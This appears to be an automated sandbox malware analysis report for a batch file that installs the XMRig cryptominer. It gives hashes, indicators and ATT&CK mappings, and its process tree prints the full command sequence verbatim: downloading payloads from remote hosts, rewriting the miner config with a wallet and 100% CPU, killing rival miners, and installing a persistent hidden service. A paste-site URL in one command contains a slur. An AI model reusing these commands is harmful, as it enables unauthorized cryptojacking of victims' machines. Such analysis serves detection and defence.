xmrig | c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e

Analysis

max time kernel
1041s
max time network
1039s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07/06/2024, 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

miner.bat
Size

169B
MD5

abfbeeced32bf0a03b8b0ceeea21e771
SHA1

ccf3673a38497264821bfe9d67a97cc8af444915
SHA256

c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e
SHA512

f2fb9f61d5f420271ab531e5b3829a1646a00b8a116a8759a4a88709d227f409e7545166284ad4a4cc0e0eac28473e633caee697d2432b412a63504bb404fa03

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 54 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023256-50.dat	family_xmrig
behavioral2/files/0x0007000000023256-50.dat	xmrig
behavioral2/memory/3708-53-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-185-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-186-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-187-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-188-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/948-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	2448	powershell.exe
30	1536	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
3708	xmrig.exe
4376	nssm.exe
4432	nssm.exe
2944	nssm.exe
572	nssm.exe
4404	nssm.exe
2040	nssm.exe
2968	nssm.exe
948	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
30	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1376	sc.exe
1380	sc.exe
3944	sc.exe
3188	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2448	powershell.exe
3420	powershell.exe
1680	powershell.exe
1336	powershell.exe
4060	powershell.exe
4572	powershell.exe
2960	powershell.exe
4364	powershell.exe
3296	powershell.exe
1652	powershell.exe
3256	powershell.exe
1536	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3696	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2448	powershell.exe
2448	powershell.exe
3420	powershell.exe
3420	powershell.exe
1680	powershell.exe
1680	powershell.exe
1336	powershell.exe
1336	powershell.exe
4364	powershell.exe
4364	powershell.exe
4060	powershell.exe
4060	powershell.exe
3296	powershell.exe
3296	powershell.exe
1652	powershell.exe
1652	powershell.exe
3256	powershell.exe
3256	powershell.exe
4572	powershell.exe
4572	powershell.exe
1536	powershell.exe
1536	powershell.exe
2960	powershell.exe
2960	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3696	taskkill.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeLockMemoryPrivilege	948	xmrig.exe
Token: SeManageVolumePrivilege	3284	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
948	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1804 wrote to memory of 5116	1804	cmd.exe	92
PID 1804 wrote to memory of 5116	1804	cmd.exe	92
PID 1804 wrote to memory of 5112	1804	cmd.exe	93
PID 1804 wrote to memory of 5112	1804	cmd.exe	93
PID 5112 wrote to memory of 2488	5112	net.exe	94
PID 5112 wrote to memory of 2488	5112	net.exe	94
PID 1804 wrote to memory of 2168	1804	cmd.exe	95
PID 1804 wrote to memory of 2168	1804	cmd.exe	95
PID 1804 wrote to memory of 4580	1804	cmd.exe	96
PID 1804 wrote to memory of 4580	1804	cmd.exe	96
PID 1804 wrote to memory of 3452	1804	cmd.exe	97
PID 1804 wrote to memory of 3452	1804	cmd.exe	97
PID 1804 wrote to memory of 2312	1804	cmd.exe	98
PID 1804 wrote to memory of 2312	1804	cmd.exe	98
PID 1804 wrote to memory of 5108	1804	cmd.exe	99
PID 1804 wrote to memory of 5108	1804	cmd.exe	99
PID 1804 wrote to memory of 1380	1804	cmd.exe	100
PID 1804 wrote to memory of 1380	1804	cmd.exe	100
PID 1804 wrote to memory of 3944	1804	cmd.exe	101
PID 1804 wrote to memory of 3944	1804	cmd.exe	101
PID 1804 wrote to memory of 3696	1804	cmd.exe	102
PID 1804 wrote to memory of 3696	1804	cmd.exe	102
PID 1804 wrote to memory of 2448	1804	cmd.exe	104
PID 1804 wrote to memory of 2448	1804	cmd.exe	104
PID 1804 wrote to memory of 3420	1804	cmd.exe	105
PID 1804 wrote to memory of 3420	1804	cmd.exe	105
PID 1804 wrote to memory of 1680	1804	cmd.exe	106
PID 1804 wrote to memory of 1680	1804	cmd.exe	106
PID 1804 wrote to memory of 3708	1804	cmd.exe	107
PID 1804 wrote to memory of 3708	1804	cmd.exe	107
PID 1804 wrote to memory of 4384	1804	cmd.exe	108
PID 1804 wrote to memory of 4384	1804	cmd.exe	108
PID 4384 wrote to memory of 1336	4384	cmd.exe	109
PID 4384 wrote to memory of 1336	4384	cmd.exe	109
PID 1336 wrote to memory of 3784	1336	powershell.exe	110
PID 1336 wrote to memory of 3784	1336	powershell.exe	110
PID 1804 wrote to memory of 4364	1804	cmd.exe	111
PID 1804 wrote to memory of 4364	1804	cmd.exe	111
PID 1804 wrote to memory of 4060	1804	cmd.exe	112
PID 1804 wrote to memory of 4060	1804	cmd.exe	112
PID 1804 wrote to memory of 3296	1804	cmd.exe	113
PID 1804 wrote to memory of 3296	1804	cmd.exe	113
PID 1804 wrote to memory of 1652	1804	cmd.exe	114
PID 1804 wrote to memory of 1652	1804	cmd.exe	114
PID 1804 wrote to memory of 3256	1804	cmd.exe	115
PID 1804 wrote to memory of 3256	1804	cmd.exe	115
PID 1804 wrote to memory of 4572	1804	cmd.exe	116
PID 1804 wrote to memory of 4572	1804	cmd.exe	116
PID 1804 wrote to memory of 1536	1804	cmd.exe	117
PID 1804 wrote to memory of 1536	1804	cmd.exe	117
PID 1804 wrote to memory of 2960	1804	cmd.exe	118
PID 1804 wrote to memory of 2960	1804	cmd.exe	118
PID 1804 wrote to memory of 3188	1804	cmd.exe	119
PID 1804 wrote to memory of 3188	1804	cmd.exe	119
PID 1804 wrote to memory of 1376	1804	cmd.exe	120
PID 1804 wrote to memory of 1376	1804	cmd.exe	120
PID 1804 wrote to memory of 4376	1804	cmd.exe	121
PID 1804 wrote to memory of 4376	1804	cmd.exe	121
PID 1804 wrote to memory of 4432	1804	cmd.exe	122
PID 1804 wrote to memory of 4432	1804	cmd.exe	122
PID 1804 wrote to memory of 2944	1804	cmd.exe	123
PID 1804 wrote to memory of 2944	1804	cmd.exe	123
PID 1804 wrote to memory of 572	1804	cmd.exe	124
PID 1804 wrote to memory of 572	1804	cmd.exe	124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\miner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\system32\curl.exe
  curl -o s.bat https://rentry.co/idiotnigger/raw/
  2⤵
  PID:5116
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2488
- C:\Windows\system32\where.exe
  where powershell
  2⤵
  PID:2168
- C:\Windows\system32\where.exe
  where find
  2⤵
  PID:4580
- C:\Windows\system32\where.exe
  where findstr
  2⤵
  PID:3452
- C:\Windows\system32\where.exe
  where tasklist
  2⤵
  PID:2312
- C:\Windows\system32\where.exe
  where sc
  2⤵
  PID:5108
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:1380
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:3944
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im xmrig.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe" --help
  2⤵
  - Executes dropped EXE
  PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\Windows\system32\HOSTNAME.EXE
      "C:\Windows\system32\HOSTNAME.EXE"
      4⤵
      PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Oailvcny\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:3188
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:1376
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:4376
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
  2⤵
  - Executes dropped EXE
  PID:4432
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
  2⤵
  - Executes dropped EXE
  PID:2944
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
  2⤵
  - Executes dropped EXE
  PID:572
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
  2⤵
  - Executes dropped EXE
  PID:2040

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:2968
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4032 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
1⤵
PID:2324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3752 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
1⤵
PID:4572

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:3004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
81c4f7a650b09a26b32713e51cd1c6bc

SHA1
74e2ecf9fa21a952062cc6785606e17dba6979d0

SHA256
9cb715d338755c9a03ed9a37b7fc294d30109082af1e56dd666179f4aee68113

SHA512
afb100e1c48c5ed930d44701a152d89aab650fcbcc261e0b45d9e4c5a2aea12d14fd37c527561ac3451c29732af5d67e9f8af8c66708d7a66fe2eb6fce6370c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
128f8c77586ab96e916275c5de5af9b9

SHA1
ee1a6af7ed9deedf62b879b3dca6d9a81da33fab

SHA256
415d2eb8b546b7c29a7be66fb592be030662aadba0907da8f96da4e2d0dfcb01

SHA512
d6485e4c35d4225291a89452da844710213d02347991481862af9dfd3bb16ac242b9df74cb95597b6180fe57e4d8247b0ab7f93884e9b44901d6daeb94318cd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2b8000b4dc0136b30a5b8de262f2cb70

SHA1
01a291a184fc0d996fce1553a9b97008976ff620

SHA256
82f4e49e5f31bc4da4ba076b9203cad5ebbe73b5fc0e9ae6ed3ffab06a121ad3

SHA512
3b698cae7a7360260869da1b62c16b71f8fb5c1cb65c16746ae5525545832f876d5abbc1cc7886d2ec4f494a04c91dbede506c91cc2913b2ac6bf733cbbd9530

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20d11a7679331cbb8e39c022a84b2afb

SHA1
3ee6f9d0efdae6457900859c09fcb2096cf4cd35

SHA256
97d5f3c105fd666c8fe2213e7ea7017b36bda14ffb138d2e5b88faa6778c0ea9

SHA512
77e4e48964dd039564a2688de55629204387a8376c220ed359ef5622084e1a0c7e28b27cc47af53e6dff7237b712dc318615aa75cfd8ba35850b3a864d4e765b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f23197093339cabeef5bcd1c4fa8984e

SHA1
7d7c8bf3fadf5063c4dcc2eaea4b43528103e035

SHA256
a9e304c2fd51d96f8ee749f0bb7c91f1e527c9b8b659f7736ec23fe492decd6c

SHA512
4f27009dd5ad4fba226be7b97ef1b75b63bb1402b82005b02461c224444edd9afd95cc1952159b7c58819a6bf0150d0d56296f652c2ab4bbf807cf0201e7fe5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a91b4f69e29fd6bf8f2d3db34ef99c8f

SHA1
c7de46cd5e4fa17816fd14cd3d00b89ec0ad2e50

SHA256
558c54dc2d3db4505dd98ae08db3ec548f84e6dacc9f5a54546dfbc85eea6103

SHA512
840ed9fd92f337242b0562b1e2dad79ac24a845192f0f92567c51dcfa716d3dfb99e37e8cc30688cd3a8faac8f8e6aadc80443a3868622a21b98dee63c8e92ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5a1ee9dd876c90e46325a0aad088787

SHA1
8fdd85e8337554297e224e656c425d1d98b87b7f

SHA256
78bfbd53167cd24aab14dc5ce22a9a4eaf806fceac14c5d8bdd162a896a7eb8d

SHA512
dcca257b27e9a7faef61278b153181e9ed2cc19cfa358ce1247704257f9222f1304962aa6cc9fec2105c1c1bfff801958b146b87b4e1cc588ba396918be91537

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
423da64f3df2fa31fa73998236b18c7e

SHA1
9f9e14492213174475d2e41e6741f5f88097e4e1

SHA256
50cc77e0a7950b0271e3ecce76b4d92c6a193741dadab1915be9448778b475c5

SHA512
d5745bd713196dd33ae1177d1411b9addc9ae70e841bf31b613fab2bea843ff8218234d18d36dd0bd2ca22b9b5801590124254903765efd0857c39d81f262abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a3a11831437b7981da201cfdb711be0

SHA1
acd27915534a7ef80d726f529f6a4f83162d4a79

SHA256
c4d7a00396efec4a5431d37d8b35839db98ede2f9f48aa90879f29ac92720d83

SHA512
066ae740c0e4900da43cb3f7901d75adba752086af516e9c7fed91c45fdc244c407338860d7c62ad2c079726a34d6db1ef7e63e7cf3532856730a30de1c9f341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oim10spo.ege.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
